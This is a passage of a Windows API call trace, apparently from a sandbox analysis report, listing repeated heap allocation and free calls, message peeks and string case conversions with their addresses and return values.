hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9358 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93d0 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93e8 [0086.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71988 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93e8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93d0 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71798 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718d8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76180 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9418 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92b0 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94c0 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95c8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9580 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9628 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94f0 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9370 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9550 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9100 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716d8 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71758 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71788 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9100 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0086.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0086.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716d8 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71758 [0086.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9100 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91a8 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91a8 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716d8 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71778 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76180 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92b0 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92b0 | out: hHeap=0x2af0000) returned 1 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77120 [0086.129] CharLowerBuffW (in: lpsz="byte[16304]", cchLength=0xb | out: lpsz="byte[16304]") returned 0xb [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71748 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92b0 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716d8 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92b0 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3fb0) returned 0x2aae878 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77120 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76180 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9100 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91a8 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0086.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0086.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91a8 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715d8 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b20 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71798 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2ab2830 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716d8 [0086.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2ab67e8 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71798 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b20 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab2830 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91a8 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab67e8 | out: hHeap=0x2af0000) returned 1 [0086.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716d8 | out: hHeap=0x2af0000) returned 1 [0086.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716d8 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76180 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71678 [0086.133] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76180 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92b0 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71778 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76180 [0086.133] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76180 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92b0 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0086.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0086.133] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715d8 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92b0 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 